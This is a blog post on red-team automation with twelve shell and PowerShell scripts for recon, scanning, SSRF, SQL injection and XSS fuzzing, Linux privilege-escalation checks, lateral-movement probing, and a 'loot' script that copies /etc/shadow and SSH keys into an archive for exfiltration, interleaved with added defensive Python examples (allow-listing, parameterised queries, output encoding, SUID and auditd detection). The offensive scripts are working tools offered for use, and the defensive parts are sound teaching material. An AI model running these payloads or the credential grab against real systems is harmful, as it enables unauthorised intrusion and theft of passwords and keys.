Red Team Automation: 12 Scripts That Save Hours (and Win Real Engagements)
Very Lazy Tech 👾
~8 min read
April 3, 2026 (Updated: April 3, 2026)
Ever burned a whole weekend on manual recon, only to realize you missed a low-hanging RCE vector because you were sorting through logs by hand? You're not alone. Over 60% of red teamers admit they waste precious hours on tasks a good script could finish before you even pour your coffee. Let's fix that — together.
Welcome to the world of red team automation. I'm about to walk you through 12 real-life scripts that I (and countless pentesters) use to speed up recon, exploitation, and post-exploitation — leaving more time for creative attacks and, honestly, more sleep.
Why Red Team Automation Matters (More Than Ever)
Red teaming is more competitive than ever. Bug bounty programs drop new assets weekly. Clients want deeper coverage in less time. If you're still clicking through Burp Suite by hand, you're probably missing out — on both findings and fun.
Here's the thing: the best red teamers aren't just manual testers; they're power-users of automation. They build, tweak, and deploy scripts for everything from OSINT to privilege escalation, making themselves practically unstoppable.
What You'll Get Today
12 actionable scripts (with code you can use or adapt)
Step-by-step usage for each—no guesswork
Tips to integrate into your workflow, whether you're a lone wolf or leading a team
Sound good? Let's roll.
1. Automated Subdomain Enumeration with Subfinder & Amass
If you're still running nslookup in a loop — stop. Subdomain enumeration is foundation work, and automation here saves hours.
Script: Bash Wrapper for Subdomain Recon
This little beauty chains Subfinder and Amass for you, merges results, and sorts out duplicates. Run it, walk away, come back to a fat list of targets.
#!/bin/bash
# Usage: ./subenum.sh <domain>
domain=$1
if [ -z "$domain" ]; then
  echo "Usage: $0 <domain>"
  exit 1
fi
subfinder -d "$domain" -silent > subs1.txt
amass enum -d "$domain" -o subs2.txt
# Merge both tools' output and drop duplicates
cat subs1.txt subs2.txt | sort -u > "${domain}_all_subs.txt"
rm subs1.txt subs2.txt
echo "[*] Subdomain enumeration complete. Results in ${domain}_all_subs.txt"
How to Use
Save as subenum.sh, then chmod +x subenum.sh
Run ./subenum.sh example.com
Drink your coffee while it runs
Why It's Gold
Kicks off two industry-standard tools at once
Dedupes every result
Scales to hundreds of domains if looped
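The merge step deserves more care than a bare sort -u once several tools feed it: case differs between tools, Amass may emit trailing dots or wildcard entries, and a name that merely contains the target domain is not in scope. The following is an added example in Python, not code from the original post, that does the merge with hostname normalisation and a scope check; the two tool outputs are constructed.

```python
"""Merge tool output into one deduplicated, in-scope subdomain list.

Added example, not code from the original post. It does what the wrapper's
`sort -u` does and adds hostname normalisation (case, trailing dots, junk
lines such as wildcards) plus a scope check that drops names that merely
contain the target domain. The tool outputs below are constructed.
"""
import re
from typing import Iterable, List, Optional

# One DNS label: 1-63 chars of letters, digits or hyphen, no leading/trailing hyphen.
_LABEL = re.compile(r"^(?!-)[a-z0-9-]{1,63}(?<!-)$")


def normalise(name: str) -> Optional[str]:
    """Lowercase, trim, drop a trailing dot; None if this is not a plain hostname."""
    name = name.strip().lower().rstrip(".")
    if not name or len(name) > 253:
        return None
    if not all(_LABEL.match(label) for label in name.split(".")):
        return None  # rejects '*.example.com', 'bad host', empty labels, etc.
    return name


def in_scope(name: str, scope: str) -> bool:
    """True for the scope domain itself or anything beneath it; 'notexample.com'
    and 'example.com.other.test' are not in scope for 'example.com'."""
    return name == scope or name.endswith("." + scope)


def merge_subdomains(sources: Iterable[Iterable[str]], scope: str) -> List[str]:
    """Union of every tool's output, normalised, deduplicated and scope-filtered."""
    scope_n = normalise(scope)
    if scope_n is None:
        raise ValueError("scope is not a valid domain: %r" % scope)
    merged = set()
    for lines in sources:
        for raw in lines:
            name = normalise(raw)
            if name is not None and in_scope(name, scope_n):
                merged.add(name)
    return sorted(merged)


# Constructed sample output from two tools, including the usual noise.
SUBFINDER_OUT = ["api.example.com", "Dev.Example.com", "api.example.com"]
AMASS_OUT = ["dev.example.com.", "www.example.com", "example.com",
             "*.example.com", "example.com.other.test", "bad host.example.com", ""]

if __name__ == "__main__":
    for s in merge_subdomains([SUBFINDER_OUT, AMASS_OUT], "example.com"):
        print(s)
```

Feed it the two raw files from the wrapper (one list per tool) and write the result where the later scripts expect it; anything the scope check drops is worth a second look before it is scanned at all.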
2. Mass Port Scanning with Fast-Scan Nmap
Manual Nmap scans are slow, especially on wide scopes. You need something snappy for initial sweeps.
Script: Quick Nmap Top 1000 Port Scanner
Here's a bash snippet that blitzes through your subdomain list.
#!/bin/bash
# Usage: ./fastscan.sh <hosts_file>
input=$1
if [ -z "$input" ]; then
  echo "Usage: $0 <hosts_file>"
  exit 1
fi
while read -r host; do
  echo "Scanning $host..."
  nmap -T4 -F -Pn "$host" | tee -a nmap_results.txt
done < "$input"
echo "Done! All results in nmap_results.txt"
Hints
-T4 speeds up scans
-F checks top 100 ports (customize as needed)
-Pn skips host discovery if ICMP is blocked
Real-World Use
I've handed off 200+ targets to this script during a live engagement — let it run overnight, then dig into the open ports with targeted scripts next morning.
3. Automated Screenshotting with Aquatone
Ever spent hours checking which subdomains are visually interesting? You don't have to.
Script: Aquatone Screenshot Collector
#!/bin/bash
# Usage: ./screenshots.sh <subdomain_list>
subs=$1
if [ -z "$subs" ]; then
  echo "Usage: $0 <subdomain_list>"
  exit 1
fi
aquatone -out aquatone_report < "$subs"
echo "[*] Aquatone complete. Open aquatone_report/aquatone_report.html to browse screenshots."
Why This Rocks
Visual triage: spot juicy apps (admin panels, test portals) at a glance
Great for reporting—drop screenshots right into your findings
Pro Tip
Combine this output with your Nmap results for targeted web attacks.
4. One-Liner for HTTP Probing: httprobe
You've got 1000 subdomains, but which ones actually respond over HTTP/HTTPS? Don't check by hand.
Script: Check HTTP/HTTPS Live Hosts
# domain is the same value you passed to subenum.sh (for example: domain=example.com)
cat "${domain}_all_subs.txt" | httprobe > live_hosts.txt
What's Happening
Feeds your big list of subs to httprobe
Dumps only live web hosts to live_hosts.txt
Use Case
Perfect before mass vulnerability scanning or XSS poking.
5. Mass Vulnerability Scanning with Nuclei
Let's be honest — manual CVE checks are for masochists. nuclei automates thousands of vulnerability checks.
Script: Nuclei Mass Scanner
nuclei -l live_hosts.txt -t cves/ -o nuclei_results.txt
Key Points
-l points to your list of live hosts
-t cves/ grabs all CVE templates (update as needed)
Output is nice and clean for grep or manual review
Real-World Impact
I've seen zero-days pop up here — especially on large external pentests where you're fishing for low-effort, high-impact bugs.
6. Automated Directory Bruteforcing with Gobuster
Directory brute-forcing by hand? Not in this decade.
Script: Gobuster Loop Over Live Hosts
#!/bin/bash
# Usage: ./dirbust.sh <live_hosts_file>
hosts=$1
if [ -z "$hosts" ]; then
  echo "Usage: $0 <live_hosts_file>"
  exit 1
fi
wordlist="/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt"
while read -r url; do
  echo "Scanning $url..."
  # turn ':' and '/' in the URL into '_' so the output name is a valid filename
  gobuster dir -u "$url" -w "$wordlist" -q -o "gobuster_${url//[:\/]/_}.txt"
done < "$hosts"
echo "Done. Check gobuster_* files for results."
What's Different Here
Handles weird domain/URL characters in filenames
Runs quietly (`-q`)
Easily parallelizable for big scopes
7. Automated SSRF Tester
SSRF (Server-Side Request Forgery) is a goldmine but a pain to test at scale. Let's automate payload injection.
Script: SSRF Fuzzer for URL Parameters
#!/bin/bash
# Usage: ./ssrf_fuzz.sh <url-with-query-string>
target=$1
if [ -z "$target" ]; then
  echo "Usage: $0 <url-with-query-string>"
  exit 1
fi
attacker_server="http://your.burpcollaborator.net"
# pull each parameter name out of the query string
params=$(echo "$target" | grep -oP '(?<=\?).*' | tr '&' '\n' | cut -d= -f1)
for param in $params; do
  # '#' as the sed delimiter: the callback URL itself contains slashes,
  # which would otherwise terminate the s/// expression
  test_url=$(echo "$target" | sed "s#\($param=\)[^&]*#\1$attacker_server#")
  echo "Testing $param: $test_url"
  curl -sk "$test_url" &
done
wait
echo "Check your Burp Collaborator or logging server for hits."
How to Use
Replace your.burpcollaborator.net with your external listener
Script injects your callback into every query parameter
Check your logs for SSRF triggers
The Cool Part?
This tactic scales — tweak for wordlists or larger target sets with minimal effort.
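What the fuzzer is looking for is a server-side fetch that follows whatever URL it is handed. The check below is an added example in Python, not code from the original post: it is the allow-list a developer puts in front of such a feature, and it is also the reason a fuzz run against a well-built endpoint comes back empty. The allowed hosts, the DNS table and the blocked ranges are constructed for the example; in real code the resolver is socket.getaddrinfo.

```python
"""Server-side allow-listing for the kind of URL-fetching parameter the SSRF
fuzzer above probes.

Added example, not code from the original post. Scheme restricted to http/https,
no embedded credentials, host on an explicit allow-list, and the resolved
addresses checked against internal ranges in case an allow-listed name is
pointed somewhere internal. DNS is replaced by a constructed table so the
example runs offline.
"""
import ipaddress
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"images.example.com", "cdn.example.com"}  # constructed

# Ranges a fetcher must never reach, listed explicitly. (ipaddress.is_global /
# is_private would also reject the RFC 5737/3849 documentation addresses used
# as sample data below, so an explicit list is clearer here.)
BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "::1/128", "fc00::/7", "fe80::/10",
)]

# Constructed DNS table standing in for socket.getaddrinfo().
FAKE_DNS = {
    "images.example.com": ["203.0.113.10"],
    "cdn.example.com": ["198.51.100.7", "2001:db8::7"],
    "internal.example.com": ["10.0.0.5"],
}


def fake_resolve(host):
    return FAKE_DNS.get(host, [])


def is_blocked_address(addr):
    ip = ipaddress.ip_address(addr)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:10.0.0.5 must be judged as 10.0.0.5
    return any(ip in net for net in BLOCKED_NETS)


def is_safe_fetch_url(url, allowed_hosts=ALLOWED_HOSTS, resolver=fake_resolve):
    """Return (ok, reason). Only ok=True URLs may be fetched server-side."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "credentials embedded in URL"
    host = (parts.hostname or "").lower().rstrip(".")
    if host not in allowed_hosts:
        return False, "host not on allow-list"
    try:
        port = parts.port
    except ValueError:
        return False, "malformed port"
    if port not in (None, 80, 443):
        return False, "port not allowed"
    addrs = resolver(host)
    if not addrs:
        return False, "host did not resolve"
    for addr in addrs:
        if is_blocked_address(addr):
            return False, "resolves to internal address " + addr
    return True, "ok"
```

The host allow-list does the real work; the address check is defence in depth for the case where DNS for an allowed name is changed under you, and the fetch itself should still be made with redirects disabled, since a redirect re-opens the same question.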
8. SQL Injection Fuzzer: Quickfire
SQLi is still rampant, but fuzzing every param by hand is tedious.
Script: Rapid SQLi Param Tester
#!/bin/bash
# Usage: ./sqli_probe.sh <url-with-query-string>
target=$1
if [ -z "$target" ]; then
  echo "Usage: $0 <url-with-query-string>"
  exit 1
fi
payload="' OR '1'='1"
params=$(echo "$target" | grep -oP '(?<=\?).*' | tr '&' '\n' | cut -d= -f1)
for param in $params; do
  test_url=$(echo "$target" | sed "s/\($param=\)[^&]*/\1$payload/")
  echo "Testing parameter $param"
  # quoting keeps the spaces in the payload inside a single URL argument
  curl -sk "$test_url" | grep -i error && echo "[!] Possible SQLi on $param"
done
What It Does
Rewrites each parameter with a classic payload
Flags possible errors for quick triage
In Practice…
You'll still want to validate manually — but this script surfaces the "weird" ones for deeper investigation.
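The grep for "error" works because a stray quote in concatenated SQL breaks the statement, and the payload works because the quote changes the statement's structure. The following is an added example in Python, not code from the original post: the same probe run against a lookup built by string formatting and against a parameterised one, on an in-memory SQLite table with constructed rows.

```python
"""The "' OR '1'='1" probe from the script above, run against a vulnerable and
a parameterised query.

Added example, not code from the original post. An in-memory SQLite database
with constructed rows stands in for the target.
"""
import sqlite3

PAYLOAD = "' OR '1'='1"  # the probe used by the script above


def make_db():
    """Constructed sample table; nothing here is real data."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT NOT NULL)")
    db.executemany("INSERT INTO users (username) VALUES (?)", [("alice",), ("bob",)])
    return db


def find_user_vulnerable(db, username):
    # Defect on purpose: the value becomes part of the SQL text, so quotes
    # in it change the statement's structure.
    sql = f"SELECT username FROM users WHERE username = '{username}' ORDER BY username"
    return [row[0] for row in db.execute(sql)]


def find_user_safe(db, username):
    # The value is bound to a placeholder and never parsed as SQL.
    sql = "SELECT username FROM users WHERE username = ? ORDER BY username"
    return [row[0] for row in db.execute(sql, (username,))]


def raises_sql_error(lookup, db, value):
    """True if the lookup throws a database error for this input; this is the
    condition the script's grep for 'error' is trying to spot in a response."""
    try:
        lookup(db, value)
    except sqlite3.DatabaseError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", find_user_vulnerable(db, PAYLOAD))  # ['alice', 'bob']
    print("safe:      ", find_user_safe(db, PAYLOAD))        # []
```

A single quote on its own raises an error from the vulnerable lookup and is just an unmatched username for the safe one, which is the difference the script's error grep is keyed on; the safe version also means a positive from the script is worth checking against how the endpoint is actually built before it goes in a report.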
9. XSS Payload Automator
Cross-site scripting is everywhere, but who wants to copy-paste payloads for each parameter?
Script: XSS Param Blaster
#!/bin/bash
# Usage: ./xss_probe.sh <url-with-query-string>
target=$1
if [ -z "$target" ]; then
  echo "Usage: $0 <url-with-query-string>"
  exit 1
fi
payload=""  # fill in your reflection test string; while it is empty the grep below matches every response line
params=$(echo "$target" | grep -oP '(?<=\?).*' | tr '&' '\n' | cut -d= -f1)
for param in $params; do
  test_url=$(echo "$target" | sed "s/\($param=\)[^&]*/\1$payload/")
  echo "Testing $param for XSS"
  curl -sk "$test_url" | grep "$payload" && echo "[*] XSS reflected on $param"
done
How to Use
Works great for GET parameters
Fires classic payload, checks if reflected
Want More?
Pair with Burp Repeater for deeper, manual tests — or expand your payload arsenal for tricky filters.
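The script's test is "does the value come back byte for byte", so it is worth seeing the renderer it catches and the one it does not. The following is an added example in Python, not code from the original post: a small results page rendered with the input echoed verbatim and with proper output encoding for element and URL contexts, plus the same reflection check the script's grep performs. The marker is a harmless constructed tag.

```python
"""Reflection check and output encoding for the GET-parameter XSS test above.

Added example, not code from the original post. The marker string is a
constructed, harmless tag; the check mirrors the script's grep for the
injected value in the response.
"""
import html
from urllib.parse import quote

MARKER = "<b>xssprobe</b>"  # constructed reflection marker, not an exploit string


def render_results_vulnerable(q):
    # Defect on purpose: the query lands in the HTML unchanged.
    return f"<p>Results for: {q}</p>"


def render_results_safe(q):
    # Element context: escape <, >, & and quotes.
    return f"<p>Results for: {html.escape(q, quote=True)}</p>"


def render_search_again_link(q):
    # URL/attribute context: percent-encode the value, including '/'.
    return f'<a href="/search?q={quote(q, safe="")}">search again</a>'


def reflected_verbatim(page, marker=MARKER):
    """What the script's `grep "$payload"` decides: is the marker echoed raw?"""
    return marker in page


if __name__ == "__main__":
    for name, render in (("vulnerable", render_results_vulnerable),
                         ("safe", render_results_safe)):
        print(name, "reflects raw:", reflected_verbatim(render(MARKER)))
```

Encoding is per context: html.escape is right inside element text and quoted attributes, percent-encoding is right inside a URL, and a value that reaches a script block or an event handler needs a different encoder again, which is why the script's grep can miss a bug as easily as find one.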
10. Mass Privilege Escalation Checker (Linux)
You've got a shell. You want root. It's not always obvious what to try — unless you automate the boring checks.
Script: Linux PrivEsc Fast Checker
#!/bin/bash
echo "[*] Checking for sudo privileges..."
sudo -l
echo "[*] Checking for writable /etc/passwd or /etc/shadow..."
ls -l /etc/passwd /etc/shadow
echo "[*] Looking for SUID binaries..."
find / -perm -4000 -type f 2>/dev/null
echo "[*] Searching for world-writable files..."
# skip /proc and /sys, which are nothing but noise here
find / -path /proc -prune -o -path /sys -prune -o -writable -type f -print 2>/dev/null
echo "[*] Scanning for backup and swap files that may hold passwords..."
find / -type f \( -name '*.bak' -o -name '*.old' -o -name '*.swp' \) 2>/dev/null
echo "[*] Done. Review outputs for privilege escalation vectors."
Why It Helps
One-off all the classic privesc checks in seconds
Helps surface misconfigurations or forgotten SUID binaries
In Practice
I've landed root access just by spotting a world-writable SUID file. This script makes sure you don't miss those easy wins.
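The same listing is worth more to whoever owns the box than to whoever just landed on it: compared against a baseline, it turns the checker into a detection. The following is an added example in Python, not code from the original post. It parses the output of the script's SUID find with a -printf added so mode and owner sit on the same line, and flags the cases the text above calls easy wins. Baseline, directory list and the find output are constructed.

```python
"""Baseline-driven audit of the SUID listing produced by the privesc checker above.

Added example, not code from the original post. Input is the output of
  find / -xdev -type f -perm -4000 -printf '%m %u %p\n'
(the script's find plus -printf). Baseline and sample output are constructed.
"""

# Constructed baseline: what this host is expected to have SUID. In practice
# record it from a known-good build and keep it under version control.
BASELINE_SUID = {"/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/su", "/usr/bin/mount"}
SYSTEM_BIN_DIRS = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/", "/usr/lib/", "/usr/libexec/")

# Constructed sample of the find output described above.
SAMPLE_FIND_OUTPUT = """\
4755 root /usr/bin/sudo
4755 root /usr/bin/passwd
4755 root /usr/bin/su
4755 root /usr/bin/mount
4777 root /opt/backup/helper
4755 root /usr/local/bin/custom_tool
"""


def parse_find_output(text):
    """Return [(mode, owner, path)] from '%m %u %p' lines; paths may contain spaces."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        mode, owner, path = line.split(" ", 2)
        entries.append((int(mode, 8), owner, path))
    return entries


def audit_suid(entries, baseline=BASELINE_SUID):
    """Return {path: {owner, mode, reasons}} for every SUID file that deserves a look."""
    findings = {}
    for mode, owner, path in entries:
        reasons = []
        if path not in baseline:
            reasons.append("not in baseline")
        if not path.startswith(SYSTEM_BIN_DIRS):
            reasons.append("outside system binary directories")
        if mode & 0o002:
            reasons.append("world-writable")  # the easy win the text above describes
        if reasons:
            findings[path] = {"owner": owner, "mode": oct(mode), "reasons": reasons}
    return findings


def missing_from_host(entries, baseline=BASELINE_SUID):
    """Baseline binaries that no longer carry SUID; usually harmless, occasionally tampering."""
    present = {path for _, _, path in entries}
    return sorted(baseline - present)


if __name__ == "__main__":
    for path, info in audit_suid(parse_find_output(SAMPLE_FIND_OUTPUT)).items():
        print(path, info["owner"], info["mode"], ", ".join(info["reasons"]))
```

Run the find on a schedule, diff against the stored baseline, and page on a world-writable or out-of-baseline SUID file owned by root; the attacker's one-off checker and the defender's periodic audit are the same command with a different question asked of the output.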
11. Lateral Movement Finder (Windows)
Once inside a network, you want to move laterally — quickly. Mapping trust relationships by hand is slow.
Script: WinRM/SMB Lateral Movement Scanner (PowerShell)
$targets = Get-Content .\hosts.txt
foreach ($target in $targets) {
    # $host is a read-only automatic variable in PowerShell, so the loop uses $target
    Write-Output "Checking $target..."
    if (Test-WSMan -ComputerName $target -ErrorAction SilentlyContinue) {
        Write-Output "$target has WinRM exposed."
    }
    if ((Test-NetConnection -ComputerName $target -Port 445 -WarningAction SilentlyContinue).TcpTestSucceeded) {
        Write-Output "$target has SMB open."
    }
}
How It Works
Reads a list of hosts (from bloodhound, nmap, whatever)
Checks for WinRM (PowerShell Remoting) and SMB (classic lateral movement vectors)
Real Talk
You'll need the right creds to exploit these, but knowing where the doors are saves tons of time.
12. Exfiltration Script: Quick Data Grabber
Once you pop a box, you want sensitive data — fast, before someone notices.
Script: Fast /etc and SSH Data Collector (Linux)
#!/bin/bash
loot_dir="loot_$(hostname)_$(date +%s)"
mkdir "$loot_dir"
cp /etc/passwd "$loot_dir/"
cp /etc/shadow "$loot_dir/" 2>/dev/null
cp -R ~/.ssh "$loot_dir/" 2>/dev/null
tar czvf "${loot_dir}.tar.gz" "$loot_dir"
echo "[*] Data exfil complete. Grab ${loot_dir}.tar.gz"
What It Snags
Password hashes
SSH keys (user context)
Compresses everything for fast transfer
How to Use
Run after privilege escalation — or as your first step post-shell
Transfer the archive, analyze offline
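The collector reads /etc/shadow and an .ssh directory within a second of each other, from an interactive session, with cp rather than any program that has business reading those files; that burst is what a blue team should key on. The following is an added example in Python, not code from the original post, that joins auditd SYSCALL and PATH records and raises exactly that alert. It assumes file watches such as -w /etc/shadow -p r -k shadow_read and -w /root/.ssh -p r -k ssh_read (and the same on each user's ~/.ssh); the expected-reader list and the log lines are constructed and shortened.

```python
"""Detecting the credential grab above in auditd logs.

Added example, not code from the original post. Assumes auditd watches keyed
shadow_read / ssh_read as described in the lead-in. Log lines are constructed
and shortened; real records carry more fields.
"""
import re
from collections import defaultdict

RECORD = re.compile(r"^type=(\w+) msg=audit\((\d+\.\d+):(\d+)\): (.*)$")
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Programs expected to read these files on a typical host (assumption; tune per system).
EXPECTED_READERS = {"/usr/bin/passwd", "/usr/sbin/sshd", "/usr/bin/sudo", "/usr/sbin/unix_chkpwd"}
AUID_UNSET = "4294967295"  # no login session, i.e. a daemon

SAMPLE_LOG = """\
type=SYSCALL msg=audit(1712059100.000:498): arch=c000003e syscall=257 success=yes exit=4 items=1 ppid=1 pid=812 auid=4294967295 uid=0 gid=0 euid=0 tty=(none) ses=4294967295 comm="sshd" exe="/usr/sbin/sshd" key="ssh_read"
type=PATH msg=audit(1712059100.000:498): item=0 name="/home/alice/.ssh/authorized_keys" inode=5012 dev=fd:01 mode=0100600 ouid=1000 ogid=1000 nametype=NORMAL
type=SYSCALL msg=audit(1712059150.000:499): arch=c000003e syscall=257 success=yes exit=3 items=1 ppid=2201 pid=2210 auid=1000 uid=0 gid=0 euid=0 tty=pts0 ses=3 comm="passwd" exe="/usr/bin/passwd" key="shadow_read"
type=PATH msg=audit(1712059150.000:499): item=0 name="/etc/shadow" inode=1310 dev=fd:01 mode=0100640 ouid=0 ogid=42 nametype=NORMAL
type=SYSCALL msg=audit(1712059200.101:501): arch=c000003e syscall=257 success=yes exit=3 items=1 ppid=2201 pid=2230 auid=1000 uid=0 gid=0 euid=0 tty=pts0 ses=3 comm="cp" exe="/usr/bin/cp" key="shadow_read"
type=CWD msg=audit(1712059200.101:501): cwd="/tmp"
type=PATH msg=audit(1712059200.101:501): item=0 name="/etc/shadow" inode=1310 dev=fd:01 mode=0100640 ouid=0 ogid=42 nametype=NORMAL
type=SYSCALL msg=audit(1712059200.350:502): arch=c000003e syscall=257 success=yes exit=3 items=1 ppid=2201 pid=2231 auid=1000 uid=0 gid=0 euid=0 tty=pts0 ses=3 comm="cp" exe="/usr/bin/cp" key="ssh_read"
type=PATH msg=audit(1712059200.350:502): item=0 name="/root/.ssh/id_ed25519" inode=7001 dev=fd:01 mode=0100600 ouid=0 ogid=0 nametype=NORMAL
type=SYSCALL msg=audit(1712059200.400:503): arch=c000003e syscall=257 success=no exit=-13 items=1 ppid=3000 pid=3001 auid=1001 uid=1001 gid=1001 euid=1001 tty=pts1 ses=5 comm="cat" exe="/usr/bin/cat" key="shadow_read"
type=PATH msg=audit(1712059200.400:503): item=0 name="/etc/shadow" inode=1310 dev=fd:01 mode=0100640 ouid=0 ogid=42 nametype=NORMAL
"""


def parse_events(lines):
    """Join the records that share one audit event id into a single dict."""
    events = defaultdict(dict)
    for line in lines:
        m = RECORD.match(line.strip())
        if not m:
            continue
        rtype, ts, event_id, rest = m.groups()
        fields = {k: v.strip('"') for k, v in FIELD.findall(rest)}
        ev = events[event_id]
        ev.setdefault("ts", float(ts))
        if rtype == "SYSCALL":
            ev.update({k: fields.get(k) for k in ("auid", "uid", "pid", "exe", "key", "success")})
        elif rtype == "PATH" and "name" in fields:
            ev.setdefault("paths", []).append(fields["name"])
    return sorted(events.values(), key=lambda e: e["ts"])


def categories(paths):
    cats = set()
    if "/etc/shadow" in paths:
        cats.add("shadow")
    if any("/.ssh/" in p for p in paths):
        cats.add("ssh")
    return cats


def detect(events, window=60.0):
    """reads: every access (allowed or denied) to a watched file by a program not
    on the expected list; sweeps: login sessions that successfully read both
    /etc/shadow and an .ssh path within `window` seconds."""
    reads, sweeps = [], []
    by_session = defaultdict(list)
    for ev in events:
        if not ev.get("key") or ev.get("exe") in EXPECTED_READERS:
            continue
        cats = categories(ev.get("paths", []))
        if not cats:
            continue
        reads.append({"ts": ev["ts"], "auid": ev.get("auid"), "pid": ev.get("pid"),
                      "exe": ev.get("exe"), "paths": ev.get("paths", []),
                      "success": ev.get("success")})
        if ev.get("success") == "yes" and ev.get("auid") != AUID_UNSET:
            by_session[ev["auid"]].append((ev["ts"], cats))
    for auid, hits in by_session.items():
        hits.sort(key=lambda h: h[0])
        for i, (t0, _) in enumerate(hits):
            seen, end = set(), t0
            for t, cats in hits[i:]:
                if t - t0 > window:
                    break
                seen |= cats
                end = t
            if {"shadow", "ssh"} <= seen:
                sweeps.append({"auid": auid, "start": t0, "end": end})
                break
    return {"reads": reads, "sweeps": sweeps}
```

The denied read by the unprivileged session still shows up in reads, because a failed attempt on /etc/shadow is the earlier signal; the sweep alert is reserved for the session that got both, which is where the page says a real engagement heads next.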
Bonus: Chaining it All Together
Here's where it gets interesting. You can chain these scripts into a full red team pipeline. Imagine:
Subdomain enum feeds live host detection
Live hosts go into Nmap, Aquatone, and Nuclei
Vulnerable hosts get Gobuster, SSRF, SQLi, and XSS fuzzers
Inside, privesc and exfil scripts make sure you don't leave loot behind
It's not just about running tools — it's about combining them so you focus on the creative part of hacking, not the grind.
Bringing It All Home
Red team automation isn't just a nice-to-have. It's your secret weapon against time, boredom, and missed findings.
Scripts like these don't make you less of a hacker — they set you free to hunt for the clever bugs, the privilege escalation chains, and the rare misconfigs that make a report shine.
If you're serious about pentesting, bug bounty, or internal red team ops, start automating these boring (but essential) tasks today. Build your own library, share with teammates, and iterate.
And hey, if you've got a killer script of your own that saved your skin, let's trade stories. The best red teams never stop learning — or automating.
Keep hacking smarter.
🚀 Become a VeryLazyTech Member — Get Instant Access
What you get today:
✅ 70GB Google Drive packed with cybersecurity content
✅ 3 full courses to level up fast
👉 Join the Membership → https://shop.verylazytech.com
📚 Need Specific Resources?
✅ Instantly download the best hacking guides, OSCP prep kits, cheat sheets, and scripts used by real security pros.
👉 Visit the Shop → https://shop.verylazytech.com
💬 Stay in the Loop
Want quick tips, free tools, and sneak peeks?
✖ https://x.com/verylazytech/
👾 https://github.com/verylazytech/
📺 https://youtube.com/@verylazytech/
📩 https://t.me/+mSGyb008VL40MmVk/
🕵️‍♂️ https://www.verylazytech.com/
#penetration-testing #cybersecurity #hacking #cyber #bug-bounty